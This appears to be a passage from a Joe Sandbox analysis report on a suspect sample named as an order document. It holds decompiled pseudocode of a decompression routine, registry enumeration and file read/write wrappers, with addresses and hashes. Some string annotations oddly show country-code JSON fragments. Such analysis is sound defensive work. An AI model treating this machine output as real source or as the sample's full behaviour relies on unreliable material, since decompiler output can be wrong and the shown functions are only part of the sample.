															__eflags = __eax -  *(__ebp - 0x74);
															if(__eax >=  *(__ebp - 0x74)) {
																__eax = __eax +  *(__ebp - 0x74);
																__eflags = __eax;
															}
															__edx =  *(__ebp - 8);
															__cl =  *(__eax + __edx);
															__eax =  *(__ebp - 0x14);
															 *(__ebp - 0x5c) = __cl;
															 *(__eax + __edx) = __cl;
															__eax = __eax + 1;
															__edx = 0;
															_t395 = __eax %  *(__ebp - 0x74);
															__eax = __eax /  *(__ebp - 0x74);
															__edx = _t395;
															__eax =  *(__ebp - 0x68);
															 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
															 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
															 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
															__eflags =  *(__ebp - 0x30);
															 *( *(__ebp - 0x68)) = __cl;
															 *(__ebp - 0x14) = _t395;
															if( *(__ebp - 0x30) > 0) {
																continue;
															} else {
																goto L78;
															}
															goto L140;
														}
														 *((intOrPtr*)(__ebp - 0x88)) = 0x1c;
														goto L138;
													}
												}
												goto L140;
											}
											 *((intOrPtr*)(__ebp - 0x88)) = 0xc;
											goto L138;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *((intOrPtr*)(__ebp - 0x88)) = 0xd;
												goto L138;
											} else {
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													while(1) {
														__eflags = __ebx - 0x100;
														if(__ebx >= 0x100) {
															goto L54;
														}
														__eax =  *(__ebp - 0x58);
														__edx = __ebx + __ebx;
														__ecx =  *(__ebp - 0x10);
														__esi = __edx + __eax;
														__ecx =  *(__ebp - 0x10) >> 0xb;
														__ax =  *__esi;
														 *(__ebp - 0x54) = __esi;
														__edi = __ax & 0x0000ffff;
														__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
														__eflags =  *(__ebp - 0xc) - __ecx;
														if( *(__ebp - 0xc) >= __ecx) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
															__cx = __ax;
															_t170 = __edx + 1; // 0x1
															__ebx = _t170;
															__cx = __ax >> 5;
															__eflags = __eax;
															 *__esi = __ax;
														} else {
															 *(__ebp - 0x10) = __ecx;
															0x800 = 0x800 - __edi;
															0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
															__ebx = __ebx + __ebx;
															 *__esi = __cx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														 *(__ebp - 0x44) = __ebx;
														if( *(__ebp - 0x10) >= 0x1000000) {
															continue;
														} else {
															__eflags =  *(__ebp - 0x6c);
															if( *(__ebp - 0x6c) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0xe;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x70);
																__eax =  *(__ebp - 0xc);
																 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																_t156 = __ebp - 0x70;
																 *_t156 =  *(__ebp - 0x70) + 1;
																__eflags =  *_t156;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																continue;
															}
														}
														goto L140;
													}
													goto L54;
												} else {
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														L54:
														_t173 = __ebp - 0x34;
														 *_t173 =  *(__ebp - 0x34) & 0x00000000;
														__eflags =  *_t173;
														L55:
														__al =  *(__ebp - 0x44);
														 *(__ebp - 0x5c) =  *(__ebp - 0x44);
														__eflags =  *(__ebp - 0x64);
														if( *(__ebp - 0x64) == 0) {
															 *((intOrPtr*)(__ebp - 0x88)) = 0x1a;
															goto L138;
														} else {
															__ecx =  *(__ebp - 0x68);
															__al =  *(__ebp - 0x5c);
															__edx =  *(__ebp - 8);
															 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
															 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
															 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
															 *( *(__ebp - 0x68)) = __al;
															__ecx =  *(__ebp - 0x14);
															 *(__ecx +  *(__ebp - 8)) = __al;
															__eax = __ecx + 1;
															__edx = 0;
															_t192 = __eax %  *(__ebp - 0x74);
															__eax = __eax /  *(__ebp - 0x74);
															__edx = _t192;
															L77:
															 *(__ebp - 0x14) = __edx;
															L78:
															 *((intOrPtr*)(__ebp - 0x88)) = 2;
															goto L1;
														}
													} else {
														L41:
														__eax =  *(__ebp - 0x5b) & 0x000000ff;
														 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
														__ecx =  *(__ebp - 0x58);
														__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
														 *(__ebp - 0x48) = __eax;
														__eax = __eax + 1;
														__eax = __eax << 8;
														__eax = __eax + __ebx;
														__esi =  *(__ebp - 0x58) + __eax * 2;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__ax =  *__esi;
														 *(__ebp - 0x54) = __esi;
														__edx = __ax & 0x0000ffff;
														__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
														__eflags =  *(__ebp - 0xc) - __ecx;
														if( *(__ebp - 0xc) >= __ecx) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
															__cx = __ax;
															 *(__ebp - 0x40) = 1;
															__cx = __ax >> 5;
															__eflags = __eax;
															__ebx = __ebx + __ebx + 1;
															 *__esi = __ax;
														} else {
															 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
															 *(__ebp - 0x10) = __ecx;
															0x800 = 0x800 - __edx;
															0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
															__ebx = __ebx + __ebx;
															 *__esi = __cx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														 *(__ebp - 0x44) = __ebx;
														if( *(__ebp - 0x10) >= 0x1000000) {
															goto L39;
														} else {
															goto L37;
														}
													}
												}
											}
											goto L140;
									}
								}
								L139:
								_t453 = _t452 | 0xffffffff;
							} else {
								L122:
								if( *(_t532 - 0x6c) == 0) {
									 *(_t532 - 0x88) = 5;
									L138:
									_t487 = 0x22;
									memcpy( *(_t532 - 0x90), _t532 - 0x88, _t487 << 2);
									_t453 = 0;
								} else {
									 *(_t532 - 0x10) =  *(_t532 - 0x10) << 8;
									 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
									 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
									 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
									goto L124;
								}
							}
							L140:
							return _t453;
						}
					}
				}
			}

0x00000000
0x00406a2e
0x00406a2e
0x00406a32
0x00406a5b
0x00406a65
0x00406a34
0x00406a3d
0x00406a4a
0x00406a4d
0x00406d91
0x00406d91
0x00406d91
0x00406d94
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00406dd9
0x00406de0
0x00406e07
0x00406e07
0x00406e0d
0x004065a9
0x004065a9
0x004065a9
0x004065b2
0x00000000
0x00000000
0x004065b8
0x00000000
0x004065c3
0x00000000
0x004065c9
0x004065cc
0x004065cf
0x004065d2
0x004065d6
0x00000000
0x004065dc
0x004065dc
0x004065df
0x004065e1
0x004065e2
0x004065e5
0x004065e7
0x004065e8
0x004065ea
0x004065ed
0x004065f2
0x004065f7
0x00406600
0x00406613
0x00406616
0x00406622
0x0040664a
0x0040664c
0x0040664e
0x00406651
0x00406652
0x00406652
0x0040664e
0x0040665a
0x0040665e
0x00000000
0x00406624
0x00406628
0x0040662d
0x0040662d
0x00406636
0x0040663e
0x00406641
0x00000000
0x00406647
0x00406647
0x00000000
0x00406647
0x00406641
0x00406622
0x004065d6
0x00000000
0x00000000
0x00406664
0x00406664
0x00406668
0x00406f14
0x00000000
0x0040666e
0x00406671
0x00406681
0x00406684
0x00406687
0x00406687
0x00406687
0x0040668a
0x0040668e
0x00000000
0x00406690
0x00406690
0x00406696
0x004066c0
0x004066c6
0x004066cd
0x00000000
0x00406698
0x0040669c
0x0040669f
0x004066a4
0x004066a4
0x004066af
0x004066b7
0x004066ba
0x00000000
0x00000000
0x00000000
0x00000000
0x004066ba
0x00406696
0x0040668e
0x00000000
0x00000000
0x004066ff
0x00406705
0x00406708
0x00406715
0x0040671d
0x00000000
0x00000000
0x004066d4
0x004066d4
0x004066d8
0x00406f23
0x00000000
0x004066de
0x004066e4
0x004066ef
0x004066ef
0x004066ef
0x004066f2
0x004066f5
0x004066f8
0x004066fd
0x00000000
0x00000000
0x00000000
0x00000000
0x004066fd
0x00000000
0x00000000
0x00406d94
0x00406d94
0x00406d9a
0x00406da0
0x00406da6
0x00406dc0
0x00406dc3
0x00406dc9
0x00406dd4
0x00406dd6
0x00406da8
0x00406da8
0x00406db7
0x00406dbb
0x00406dbb
0x00000000
0x00000000
0x00000000
0x00000000
0x00406725
0x00406727
0x0040672a
0x0040679b
0x0040679e
0x004067a1
0x004067a8
0x004067b2
0x00000000
0x0040672c
0x0040672c
0x00406730
0x00406733
0x00406735
0x00406738
0x0040673b
0x0040673d
0x00406740
0x00406742
0x00406747
0x0040674a
0x0040674d
0x00406751
0x00406758
0x0040675b
0x00406762
0x00406766
0x0040676e
0x0040676e
0x0040676e
0x00406768
0x00406768
0x00406768
0x0040675d
0x0040675d
0x0040675d
0x00406772
0x00406775
0x00406793
0x00406795
0x00406968
0x00406968
0x0040696b
0x0040696e
0x00406971
0x00406974
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406983
0x00406986
0x0040699e
0x004069a1
0x004069a4
0x004069a7
0x004069a7
0x004069aa
0x004069ae
0x004069b0
0x00406988
0x00406988
0x00406990
0x00406995
0x00406997
0x00406999
0x00406999
0x004069b3
0x004069ba
0x004069bd
0x00000000
0x004069bf
0x0040693b
0x0040693f
0x00406f47
0x00000000
0x00406945
0x00406945
0x00406948
0x0040694b
0x0040694f
0x00406952
0x00406958
0x0040695a
0x0040695a
0x0040695a
0x0040695d
0x00000000
0x0040695d
0x0040693f
0x00000000
0x00406960
0x00406960
0x00406960
0x00000000
0x00406777
0x00406777
0x0040677a
0x0040677d
0x00406780
0x00406782
0x00406782
0x00406782
0x00406785
0x00406788
0x0040678a
0x0040678b
0x0040678e
0x00000000
0x0040678e
0x00406775
0x00000000
0x00000000
0x004069c4
0x004069c8
0x004069e6
0x004069e9
0x004069f0
0x004069f3
0x004069f6
0x004069f9
0x004069fc
0x004069ff
0x00406a01
0x00406a08
0x00406a09
0x00406a0b
0x00406a0e
0x00406a11
0x00406a14
0x00406a14
0x00406a19
0x00000000
0x004069ca
0x004069ca
0x004069cd
0x004069d0
0x004069da
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a71
0x00406a75
0x00000000
0x00406a7b
0x00406a7b
0x00406a7f
0x00000000
0x00406a85
0x00406a85
0x00406a87
0x00406a8e
0x00406a92
0x00406a95
0x00406a99
0x00406f5f
0x00000000
0x00406a9f
0x00406a9f
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406acb
0x00406acb
0x00406ace
0x00000000
0x00406ace
0x00406a99
0x00406a7f
0x00000000
0x00000000
0x00406ae2
0x00406ae6
0x00406aed
0x00406af0
0x00406af3
0x00406afd
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00406ae8
0x00406ae8
0x00000000
0x00406ae8
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00000000
0x00406b09
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00406b23
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2c
0x00406b2f
0x00406b36
0x00406b3b
0x00406a1c
0x00406a1c
0x00406a1f
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91
0x00000000
0x00406bc9
0x00406bc9
0x00406bc9
0x00406bcd
0x00000000
0x00000000
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406be8
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c02
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c13
0x00406c16
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00000000
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce0
0x00406ce7
0x00406c71
0x00406c71
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c4c
0x00406c50
0x00406f77
0x00000000
0x00406c56
0x00406c56
0x00406c59
0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00000000
0x00406ce7
0x00406cee
0x00406cee
0x00406cee
0x00406cf1
0x00406cf1
0x00406cf1
0x00406cf4
0x00406cf7
0x00406cf9
0x00406f83
0x00000000
0x00406cff
0x00406cff
0x00406d02
0x00000000
0x00406d08
0x00406d08
0x00406d0c
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d12
0x00406d12
0x00406d16
0x00000000
0x00000000
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4b
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00406d56
0x00000000
0x00406d56
0x00000000
0x00406d54
0x00406f89
0x00000000
0x00406f89
0x00406d02
0x00000000
0x00406cf9
0x00406f6b
0x00000000
0x00000000
0x004067be
0x004067be
0x004067c2
0x00406f2f
0x00000000
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067dd
0x004067dd
0x004067e0
0x004067e3
0x004067e3
0x004067e6
0x004067e9
0x0040689c
0x0040689c
0x004068a2
0x00000000
0x00000000
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068bf
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ea
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068ef
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x00406877
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406896
0x00406896
0x00406899
0x00000000
0x00406899
0x0040687b
0x00000000
0x004068f9
0x00000000
0x004067ef
0x004067ef
0x004067f5
0x00406900
0x00406900
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690a
0x0040690e
0x00406f53
0x00000000
0x00406914
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x00000000
0x00406ad3
0x004067fb
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406826
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x00406859
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406862
0x00406869
0x0040686c
0x00000000
0x00406872
0x00000000
0x00406872
0x0040686c
0x004067f5
0x004067e9
0x00000000
0x00000000
0x004065b8
0x00406fc0
0x00406fc0
0x00406de2
0x00406de2
0x00406de6
0x00406f95
0x00406fab
0x00406fb3
0x00406fba
0x00406fbc
0x00406dec
0x00406df2
0x00406df9
0x00406e01
0x00406e04
0x00000000
0x00406e04
0x00406de6
0x00406fc3
0x00406fc7
0x00406fc7
0x00406d94
0x00406d91

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
Instruction ID: cefc1bbef9c73defef891fc114d0afe65c0266ceafdcaf147cd695a7a928f12c
Opcode Fuzzy Hash: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
Instruction Fuzzy Hash: E1715671E00229DBDF28CF98C8447ADBBB1FF44305F15846AD816BB281CB795996DF44

Uniqueness

Uniqueness Score: -1.00%

Function 004024DF Relevance: 4.5, APIs: 3, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004024DF(int* __ebx, intOrPtr __edx, char* __esi) {
				void* _t9;
				int _t10;
				long _t13;
				int* _t16;
				intOrPtr _t21;
				void* _t22;
				char* _t24;
				void* _t26;
				void* _t29;

				_t24 = __esi;
				_t21 = __edx;
				_t16 = __ebx;
				_t9 = E00402B01(_t29, 0x20019); // executed
				_t22 = _t9;
				_t10 = E00402A9F(3);
				 *((intOrPtr*)(_t26 - 0x3c)) = _t21;
				 *__esi = __ebx;
				if(_t22 == __ebx) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				} else {
					 *(_t26 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
						_t13 = RegEnumValueA(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
						__eflags = _t13;
						if(_t13 != 0) {
							 *((intOrPtr*)(_t26 - 4)) = 1;
						}
					} else {
						RegEnumKeyA(_t22, _t10, __esi, 0x3ff); // executed
					}
					_t24[0x3ff] = _t16;
					_push(_t22); // executed
					RegCloseKey(); // executed
				}
				 *0x4247c8 =  *0x4247c8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}

0x004024df
0x004024df
0x004024df
0x004024e4
0x004024eb
0x004024ed
0x004024f5
0x004024f8
0x004024fa
0x00402716
0x00402500
0x00402508
0x0040250b
0x00402524
0x0040252a
0x0040252c
0x0040252e
0x0040252e
0x0040250d
0x00402511
0x00402511
0x00402535
0x0040253b
0x0040253c
0x0040253c
0x00402954
0x00402960

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsa7CF6.tmp,00000000,00000011,00000002), ref: 0040253C

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 48b7f54743d05fe993f7ca0d5b308b8535ceec46d0e8e1fe29002ae7db816acf
Instruction ID: 518a01c90e212b4e6c6a91e55dc37795372a660c14e02f5234546a481bba951e
Opcode Fuzzy Hash: 48b7f54743d05fe993f7ca0d5b308b8535ceec46d0e8e1fe29002ae7db816acf
Instruction Fuzzy Hash: 9901B171A04105AFE7159F69DE9CABF7ABCEF80348F10003EF405A61C0DAB84A419729

Uniqueness

Uniqueness Score: -1.00%

Function 00405CD9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CD9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405cdd
0x00405ced
0x00405cf5
0x00000000
0x00405cfc
0x00000000
0x00405cfe

APIs

WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040E0FC,"numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph,00403246,"numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph,0040E0FC,004138D8,00004000,?,00000000,00403070,00000004), ref: 00405CED

Strings

"numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph, xrefs: 00405CD9

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FileWrite
String ID: "numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph
API String ID: 3934441357-208995783
Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction ID: e5327eed263ed0cb59b3772f759b7efddda8826228879d6768eb485b7ec61b42
Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
Instruction Fuzzy Hash: CEE0EC3225065AABDF509E95AD08FEB7B6CEF053A0F008837F915E2150D631E821DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405CAA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CAA(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405cae
0x00405cbe
0x00405cc6
0x00000000
0x00405ccd
0x00000000
0x00405ccf

APIs

ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138D8,"numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph,004032C2,0040A130,0040A130,004031C6,004138D8,00004000,?,00000000,00403070), ref: 00405CBE

Strings

"numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph, xrefs: 00405CAA

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID: FileRead
String ID: "numeric": "408", "official_name": "Democratic People's Republic of Korea" }, { "alpha_2": "PT", "alpha_3": "PRT", "name": "Portugal", "numeric": "620", "official_name": "Portuguese Republic" }, { "alph
API String ID: 2738559852-208995783
Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
Instruction ID: 86bb3e2151b1fdd0dbac44507bcf00ea7ca2ece369def3772f3446380bdcc129
Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
Instruction Fuzzy Hash: DAE08C3220825EABEF109E508C00EEB3B6CFB00361F144432FD10E7040E230E860ABB4

Uniqueness

